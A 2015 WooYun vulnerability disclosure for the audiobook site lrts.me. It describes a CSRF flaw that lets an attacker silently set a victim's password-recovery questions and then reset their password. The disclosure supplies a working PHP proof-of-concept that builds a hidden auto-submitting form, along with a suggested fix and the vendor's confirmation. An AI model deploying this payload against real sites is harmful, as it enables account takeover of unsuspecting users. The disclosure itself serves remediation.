当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0130989

漏洞标题:懒人听书CSRF漏洞悄无声息设置他人的密保问题

相关厂商:lrts.me

漏洞作者: Security

提交时间:2015-08-03 14:11

修复时间:2015-09-17 14:26

公开时间:2015-09-17 14:26

漏洞类型:CSRF

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-03: 细节已通知厂商并且等待厂商处理中
2015-08-03: 厂商已经确认,细节仅向厂商公开
2015-08-13: 细节向核心白帽子及相关领域专家公开
2015-08-23: 细节向普通白帽子公开
2015-09-02: 细节向实习白帽子公开
2015-09-17: 细节向公众公开

简要描述:

懒人听书
解放双眼,畅听世界。
====================================
针对那些没有设置密保问题的用户,就让我默默的给他or她加一层安全防护吧。

详细说明:

1、未设置密码问题时候的页面。

未设置密码问题.png


1.1将如下代码上传到服务器,复制上传后得到的链接。

<?php
echo '<meta http-equiv=Content-Type content="text/html;charset=utf-8">';
$csrf = "<form method='post' action='http://www.lrts.me/update/integral.do?'>";
$csrf = $csrf."<input type='text' value='test2' name='answerA' style='display:none!important;display:block;width=0;height=0' />";
$csrf = $csrf."<input type='text' value='test2' name='answerB' style='display:none!important;display:block;width=0;height=0' />";
$csrf = $csrf."<input type='text' value='我就读的第一所学校的名称' name='questionA' style='display:none!important;display:block;width=0;height=0' />";
$csrf = $csrf."<input type='text' value='我最喜欢的休闲运动是什么' name='questionB' style='display:none!important;display:block;width=0;height=0' />";
$csrf = $csrf."<input type='text' value='' name='token' style='display:none!important;display:block;width=0;height=0' />";
$csrf = $csrf."</form>";
$csrf = $csrf."<script>document.forms[0].submit();</script>";
echo($csrf);
?>


如上问题的答案为:test1 test2,当然,问题和答案都可以在相应位置自己修改的。
1.2当用户点击链接后,成功设置密码问题:

成功设置密码问题.png


1.3找回密码试一下:

找回密码.png

漏洞证明:

1.4找回密码成功:

找回密码成功.png


虽然在第二次修改密保问题的时候加入了token,但是,第一次设置密保问题时并没有加token。这真是个悲哀的故事。

修复方案:

*在第一次添加密保问题的时候就加入token;验证来源地址Referer。

版权声明:转载请注明来源 Security@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-08-03 14:25

厂商回复:

这个漏洞问题严重,可以设置用户密保,并且可以通过密保找回密码!

最新状态:

暂无